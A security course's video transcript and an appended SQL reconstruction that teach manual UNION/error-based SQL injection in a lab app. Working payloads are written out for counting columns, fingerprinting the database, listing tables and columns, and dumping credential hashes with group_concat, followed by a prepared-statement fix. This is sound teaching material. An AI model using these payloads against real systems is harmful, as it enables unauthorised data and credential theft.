All language subtitles for 005 Exploiting SQL Injection, manual way - Part 2.en

Now let's discuss how this error-based SQL injection can be exploited. Anyway, I'm here at the SQL injection option, which is an error-based SQL injection challenge. We can use either the select item code option or the search option. I'm going to use this search option for this exercise. So let's first enter one and click submit and see what happens.

OK, so it is showing some results for the item ID 1. Let's enter two and see what happens. OK. Seems like there are no items for the ID 2 now. Let's enter one and a single quote and let's click submit, and look at that. There is an error here which says "Call to a member function fetch_assoc() on a non-object in home ... on line 65". When you see this fetch_assoc, it is most likely a MySQL error. So probably the single quote that we have injected is causing this SQL error. Let's try to understand what might have happened in the background. Let me open Mousepad to explain this.

Here it is. Now, possibly this is the backend query: select star from some table name. I assume it is coffee, because when you entered one, it is showing some coffee-related images and description. So I chose my table as coffee, where the item ID or the item code equals something. So this is the existing query. That's what I'm assuming. Now, when you enter one, it has perfectly executed and it has shown us the results. But when we entered one and a single quote, it has thrown an error, possibly because one single quote is open here and one single quote is closed, and there is one more single quote that is left unclosed. So possibly because of that, there was a SQL error. We can confirm if the error is caused by our single quote by adding one more single quote. What will happen? There is one single quote opened and one single quote closed. And because we are adding an additional single quote, it is going to close the existing unclosed single quote. So let's try to add another single quote and see if the error is gone. If it is gone, that means our analogy is correct, and this application is vulnerable to SQL injection.

So I'm just adding one and two single quotes. Clicking submit, and look at that. There is no error this time. Now, just to confirm that this is happening because of SQL injection, let's add one more single quote, making it a total of three single quotes, and see if the error comes back, because there will be one single quote left unclosed. OK, so I'm just entering one and three single quotes. Let's click submit. And there it is. There is a MySQL error once again. So this confirms that the application is vulnerable to SQL injection.

Now, this confirms that the application is vulnerable. Now, what is the next step? We want to exploit it and extract information from the database. To do that, there are a few steps that we need to do here. The first step is to obtain the number of columns that are being used by the query that is written in the background. There is a reason for doing that, which I'll explain in a moment. But to identify the number of columns, we can simply use the same query and write an order by statement. So what we are going to do is we are going to write order by one, and we are just commenting out everything after order by one so that the single quote that is left unclosed will not cause any error. So we are closing the existing single quote by using a single quote after one, and we are writing our own SQL statements here. What order by one will do is it is going to try to order the results based on the column number one. If column number one exists, there won't be any error and the data will be sorted. So that's the idea. If the column doesn't exist, it is going to throw an error. So we will have to increment this number until we get an error. So we will get a conclusion that that specific column doesn't exist in the database. So that's the idea.

So let's go ahead. I'm going to copy this from one till the hash, and let's enter this in the search field. Let's click submit. No error. Let's increment this one and click submit again. There is no error. Let's make it five and see what happens. Once again, there is no error. Let's make it eight. There is an error, which means the eighth column doesn't exist. Let's make it seven. No error. This confirms that the table has seven columns.

Identifying this number of columns is required because in the next step, we are going to use a union statement. A union statement can be used with two different select statements on both sides. Now, on both the sides, the number of columns in the select statements have to be equal. Let me show you how that looks. I'm going to copy this first. And I'm going to sit here, and instead of order by one, I'm going to write a union statement. And as I mentioned, the union statement allows you to write select statements on both the sides. So these select statements should have the same number of columns. So on the right side, I'm giving one, two, three, four, five, six and seven. Since we obtained the number of columns on the left-hand side in the previous step, we are able to give the number of columns on the right-hand side in this step. That's exactly the reason why we identified the number of columns in the previous step.

OK, so since it is an error-based SQL injection, if one of these numbers is displayed back on the screen, we can basically use that displayed number to retrieve further information from the database. So let's copy this and insert it into the search field and hope for some number being displayed back. I'm pasting it here, and let's click submit. And there are a bunch of numbers here: two, four, five and six. We can use any of these numbers to retrieve information from the database. So to do that, I'm going to first copy this line here, and let's start here, and let's probably use the number five, which is displayed back. So instead of five, I'm going to use database(). So we can just copy this. And if everything goes fine, we should get the name of the database. So just watch out for this number five here and see what happens. Click submit. Look at that: instead of number five, we are getting the name of the database, and the rest of the numbers are there as is. OK, now let's go back. And we have gotten the name of the database.

Now, once again, I'm just going to copy it and paste it here, and we can also get the version as well as the name of the user being used. So let's do it one by one. First, let's try to get the version. As you can see, the version is this. It also contains the version of the Ubuntu server, which is 14.04 in this case. Now, the best part is we just don't need to stick to one column, since the other columns are also being displayed back. For example, column number two, we can use this for displaying the user information. So I'm just going to copy it once again. And I'll paste it here and let's click submit. Now look at that: instead of the number two, we are getting the username of the MySQL database, which is root in this case. And let's go ahead and paste it here. OK, so we have gotten both the username as well as the database version.

Now the next step is to identify the table names and column names. And once we get these two, we can actually get the actual data that is stored in the tables. So the database contains tables, tables contain columns and data. That's the reason why we are going in this order. So the next step is to find out the list of tables that are available in the database. So I'm just going to copy this line once again, and paste it here. Now, let's just replace this user with two, and let's use this five for retrieving the table names. I'm going to use table_name, which is a predefined variable kind of thing. You shouldn't change this, because all the tables will be retrieved using this table_name. And the table names or any other metadata in MySQL is stored in a special database called information_schema, and the table names can be accessed by using information_schema.tables. So we are going to use this to retrieve table names. I'm copying this payload here. And let's go back and let's paste it here.

Now, it has dumped a lot of table names, and what we are interested in is some custom tables which may contain user-specific information. So let's search for tables with the word user. I'm typing users. There it is, there is a table named users, and looks like that's the end of it, so most likely it is a user-defined table. So I'm copying this. And let's go back to the notepad and let's use this information here. So this users table is what we are interested in now. Once again, let me just copy this whole line and paste it here, and this time we want to dump the column names for this table users. To dump the column names, we can just replace table_name with column_name, and information_schema.columns should be used here because this is what is going to contain the column names. So once again, I'm copying this. And I'm going to paste it here, and let's click submit.

If you notice, there are a lot of columns. A users table having all of these columns is highly unlikely. So what's happening here is the query that we have inserted is dumping all the columns from information_schema, which is not required by us. Now, what we are interested in is the column names only from this users table. So let's add a filter here, saying where table_name is users. OK, so let's copy this payload and let's paste it again, let's click submit, and there it is. Interestingly, there are only three columns in this table: uid, username and password. So let's note them down. Username, password, uid: these are the three columns we identified from the users table. Now the last step is to extract these details. So let's modify our payload a bit so that we can extract the usernames and passwords from the users table.

OK, the first thing that I'm going to do is I will just remove this information_schema.columns, because we are not looking for metadata anymore. We are looking for the actual data stored in the table. So we want to retrieve data from the users table. And instead of column names, we want the actual data, and we know the column names. So we will just use uid, username, password. But if you notice, we are actually using more than seven columns here, because we are just using these three as three different columns. Instead, we can just pick all of them and concatenate them into one column. For that, I can use group_concat, and when this information is displayed on the web page, I want these details to be separated by a colon like this. So for that, I'm going to use a hex value to specify that the colon has to be displayed. So 0x3a here and 0x3a here. So this payload should dump all the data that we are expecting. So I'm just going to copy my payload to be injected once again. And let's paste it there.

There it is. If you notice, we have got the uid one, which is admin, and there is a password hash. Similarly, the second one has a password hash. There is a third user with the name user, and he has a password hash. So let's copy all of this. And paste here. So this is the list of credentials that we have extracted from the table now. The passwords are not in clear text. They are stored in hashed format, which is good. But if these hashes are generated using a weak hashing algorithm, they can be easily cracked. The purpose of this demo is only to show you how to exploit error-based SQL injection by using manual techniques and without using any automated tools. So cracking these hashes is something which we will discuss later. I hope you have enjoyed this exercise of exploiting error-based SQL injections. In later videos, we are also going to discuss how we can use automated tools to exploit SQL injection. So that's all for this video. See you in the next one.
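The whole procedure from the video, written out as the SQL that actually reaches the server, is collected below as an added example; it is the editor's reconstruction, not material from the course. The lab schema is constructed: the table name coffee, the column item_code and the other six column names are assumptions standing in for whatever the real challenge uses, and the three users rows and their MD5 hashes are made up. Each step shows the payload typed into the search field in a comment and the statement the application ends up running. Two things go beyond the video: the table listing is restricted to the current schema with table_schema = database(), and the last step shows the same payload handed to a server-side prepared statement so that it is treated as data. MySQL/MariaDB syntax throughout.

```sql
-- Added example (editor's reconstruction, not the course's own code).
-- Constructed lab schema; table and column names are assumptions.
CREATE DATABASE IF NOT EXISTS sqli_lab;
USE sqli_lab;

DROP TABLE IF EXISTS coffee;
CREATE TABLE coffee (              -- seven columns: ORDER BY 7 works, ORDER BY 8 errors
  item_code VARCHAR(16) PRIMARY KEY,
  name      VARCHAR(64),
  origin    VARCHAR(64),
  roast     VARCHAR(32),
  descr     TEXT,
  price     DECIMAL(6,2),
  img       VARCHAR(128)
);
INSERT INTO coffee VALUES
  ('1', 'House Blend', 'Brazil', 'medium', 'Smooth everyday cup', 8.50, '/img/1.jpg');

DROP TABLE IF EXISTS users;        -- the three columns the video finds: uid, username, password
CREATE TABLE users (uid INT PRIMARY KEY, username VARCHAR(32), password CHAR(32));
INSERT INTO users VALUES           -- constructed sample rows; MD5 chosen only for brevity
  (1, 'admin',  MD5('admin-secret')),
  (2, 'editor', MD5('editor-secret')),
  (3, 'user',   MD5('password'));

-- 1. The query the application is assumed to build around the search field.
SELECT * FROM coffee WHERE item_code = '1';

-- 2. Quote balancing. Input 1'  lands as  ... = '1'';  (unterminated string):
--    a syntax error, mysqli's query() returns false, and calling fetch_assoc()
--    on that false is the PHP fatal the video shows. Input 1''  is valid again
--    because '' inside a literal is an escaped quote; the server compares
--    against the string 1' and simply finds no rows:
SELECT * FROM coffee WHERE item_code = '1''';
--    Input 1''' leaves one quote open and errors again. Error / no error / error
--    for one, two and three quotes is the confirmation the video relies on.

-- 3. Column count. Input  1' ORDER BY 7#  lands as
--      SELECT * FROM coffee WHERE item_code = '1' ORDER BY 7#'
--    The # comments out the application's trailing quote. ORDER BY 8 fails with
--    "Unknown column '8' in 'order clause'", so the SELECT has seven columns.
SELECT * FROM coffee WHERE item_code = '1' ORDER BY 7;

-- 4. UNION with seven marker values; whichever markers show up on the page are
--    the columns that can carry data out (2, 4, 5 and 6 in the video).
SELECT * FROM coffee WHERE item_code = '1' UNION SELECT 1, 2, 3, 4, 5, 6, 7;

-- 5. Fingerprint through the reflected columns (video: database() and then
--    version() in column 5, user() in column 2).
SELECT * FROM coffee WHERE item_code = '1'
  UNION SELECT 1, user(), 3, 4, database(), version(), 7;

-- 6. Table names. The table_schema filter is an addition to the video's payload:
--    it skips the information_schema / mysql system tables that flooded the page.
SELECT * FROM coffee WHERE item_code = '1'
  UNION SELECT 1, 2, 3, 4, table_name, 6, 7
    FROM information_schema.tables WHERE table_schema = database();

-- 7. Column names of the interesting table. Without the WHERE this lists every
--    column of every table, which is the "too many columns" result in the video.
SELECT * FROM coffee WHERE item_code = '1'
  UNION SELECT 1, 2, 3, 4, column_name, 6, 7
    FROM information_schema.columns WHERE table_name = 'users';

-- 8. Dump the rows through one reflected column. group_concat folds all rows
--    into a single string; 0x3a is ':' so the page shows uid:username:password.
SELECT * FROM coffee WHERE item_code = '1'
  UNION SELECT 1, 2, 3, 4, group_concat(uid, 0x3a, username, 0x3a, password), 6, 7
    FROM users;

-- 9. The fix, shown server-side: a bound parameter keeps the payload as data.
--    The same 1' ORDER BY 7# string is now just a value that matches no row.
PREPARE item_lookup FROM 'SELECT * FROM coffee WHERE item_code = ?';
SET @search = '1'' ORDER BY 7#';
EXECUTE item_lookup USING @search;
DEALLOCATE PREPARE item_lookup;
```

Run the file with `mysql < sqli_walkthrough.sql` against a throwaway instance. Note the comment styles: inside a payload `#` comments to end of line, `-- ` needs the trailing space, and `/* */` is the fallback when the application strips newlines or spaces. Step 9 is what the application should have done in the first place: with the value bound, the quote and the ORDER BY never reach the parser as syntax, and the error channel the whole attack depends on disappears.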
